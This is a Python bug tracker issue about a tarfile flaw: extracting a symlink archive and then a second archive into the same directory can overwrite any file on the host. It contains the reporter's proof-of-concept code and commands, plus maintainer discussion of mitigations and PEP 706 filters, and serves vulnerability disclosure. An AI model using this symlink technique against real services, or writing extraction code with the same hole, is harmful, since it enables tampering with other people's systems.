Skip to content

"tarfile" library will lead to "write any content to any file on the host". #88189

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed
leveryd mannequin opened this issue May 3, 2021 · 6 comments
Closed

"tarfile" library will lead to "write any content to any file on the host". #88189

leveryd mannequin opened this issue May 3, 2021 · 6 comments
Labels
3.7 (EOL) end of life stdlib Python modules in the Lib dir type-security A security issue

Comments

@leveryd
Copy link
Mannequin

leveryd mannequin commented May 3, 2021

BPO 44023
Nosy @gpshead, @merwok
Files
  • poc.tar.gz
  • Note: these values reflect the state of the issue at the time it was migrated and might not reflect the current state.

    Show more details

    GitHub fields:

    assignee = None
    closed_at = None
    created_at = <Date 2021-05-03.17:44:03.787>
    labels = ['type-security', '3.7', 'library']
    title = '"tarfile" library will lead to "write any content to any file on the host".'
    updated_at = <Date 2021-05-08.03:14:09.942>
    user = 'https://bugs.python.org/leveryd'

    bugs.python.org fields:

    activity = <Date 2021-05-08.03:14:09.942>
    actor = 'gregory.p.smith'
    assignee = 'none'
    closed = False
    closed_date = None
    closer = None
    components = ['Library (Lib)']
    creation = <Date 2021-05-03.17:44:03.787>
    creator = 'leveryd'
    dependencies = []
    files = ['50005']
    hgrepos = []
    issue_num = 44023
    keywords = []
    message_count = 3.0
    messages = ['392827', '393219', '393234']
    nosy_count = 3.0
    nosy_names = ['gregory.p.smith', 'eric.araujo', 'leveryd']
    pr_nums = []
    priority = 'normal'
    resolution = None
    stage = None
    status = 'open'
    superseder = None
    type = 'security'
    url = 'https://bugs.python.org/issue44023'
    versions = ['Python 3.7']

    @leveryd
    Copy link
    Mannequin Author

    leveryd mannequin commented May 3, 2021

    if uncompress file twice to the same dir, attacker can "write any content to any file on the host"".

    poc code like below:

    import tarfile
    
    
    dir_name = "/tmp/anything"
    file1_name = "/tmp/a.tar.gz"  # ln -sv /tmp/a test_tar/a;tar -cvf a.tar.gz test_tar/a
    file2_name = "/tmp/b.tar.gz"  # echo "it is just poc" > /tmp/payload; rm -rf test_tar; cp /tmp/payload test_tar/a;tar -cvf b.tar.gz test_tar/a
    
    
    def vuln_tar(tar_path):
    	"""
    	:param tar_path:
    	:return:
    	"""
    	import tarfile
    	tar = tarfile.open(tar_path, "r:tar")
    	file_names = tar.getnames()
    	for file_name in file_names:
    	    tar.extract(file_name, dir_name)
    	tar.close()
    
    
    vuln_tar(file1_name)
    vuln_tar(file2_name)
    

    in this poc code, if one service uncompress tar file which is uploaded by attacker to "dir_name" twice, attacker can create "/tmp/a" and write "it is just poc" string into "/tmp/a" file.

    @leveryd leveryd mannequin added 3.7 (EOL) end of life stdlib Python modules in the Lib dir type-security A security issue labels May 3, 2021
    @merwok
    Copy link
    Member

    merwok commented May 7, 2021

    Can you contact the security team (info at https://www.python.org/dev/security/ ) directly?

    In general, tarfile (and other Python file functions!) can create files anywhere on the filesystem, provided that the process user has the right permissions. But it seems that you’re talking about an unexpected behaviour leading to unwanted operations, so please send more details about the problem to the team. Thank you for your report!

    @gpshead
    Copy link
    Member

    gpshead commented May 8, 2021

    TL;DR - A tar file being extracted doesn't check to see if it is overwriting an existing file, which could be a symlink to elsewhere leading to elsewhere's contents being clobbered assuming the elsewhere file exists.

    doing an unlink before opening the destination file (ignoring either success or FileNotFound) during extract would avoid this _specific_ case.

    But tarfile is already documented with a warning about untrusted inputs being able to do bad things:

    https://docs.python.org/3/library/tarfile.html#tarfile.TarFile.extractall

    fixing this one serialized case doesn't do anything about other cases or race conditions we won't claim protection against, so I'm not sure this issue is serious from a stdlib perspective.

    @nascheme
    Copy link
    Member

    This looks like a relevant change from OpenBSD pax:

    Prevent an archive from esacaping the current directory by itself
    openbsd/src@6b45b47

    Handling symlinks in general is fraught with danger. See:

    https://lwn.net/Articles/899543/

    @gpshead
    Copy link
    Member

    gpshead commented Sep 25, 2022

    hah, I enjoy the editorial description of what openbsd does in their comment: openbsd/src@6b45b47#diff-8934d8de794095d2f05a1d6ff3354b371ce2d2e01d0fe4ddf43b853ef5a0e077R460

    @encukou
    Copy link
    Member

    encukou commented May 3, 2023

    PEP-706 (Filter for tarfile.extractall) has been implemented in #102950. See the added docs.

    Python 3.12, and security updates to some earlier releases, will allow users to avoid this issue by changing their code/settings.
    Python 3.12 will emit a warning urging people to do that.
    Python 3.14 will make safer behaviour the default.


    For the original report: note that you don't need to extract twice -- tar members are extracted sequentially, and don't need to have unique names. With the PoC in the first comment, do cat a.tar.gz b.tar.gz > c.tar.gz, and extract just c.tar.gz!

    Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
    Labels
    3.7 (EOL) end of life stdlib Python modules in the Lib dir type-security A security issue
    Projects
    Status: Done
    Development

    No branches or pull requests

    4 participants